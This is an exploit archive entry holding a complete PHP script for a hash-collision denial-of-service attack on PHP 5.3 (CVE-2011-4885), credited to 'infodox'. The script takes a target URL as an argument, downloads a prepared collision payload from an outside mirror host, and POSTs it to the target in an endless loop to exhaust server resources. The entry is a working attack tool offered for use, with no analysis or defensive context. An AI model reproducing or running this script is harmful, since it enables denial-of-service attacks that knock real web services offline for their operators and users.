Exploit for php platform in category dos / poc
<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885
Mirrors List:
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt
Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing
Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
echo "firing";
$ch = curl_init("$targ");
curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
curl_exec($ch);
curl_close($ch);
echo "[+] Voly Sent!";
}
?>
# 0day.today [2018-02-06] #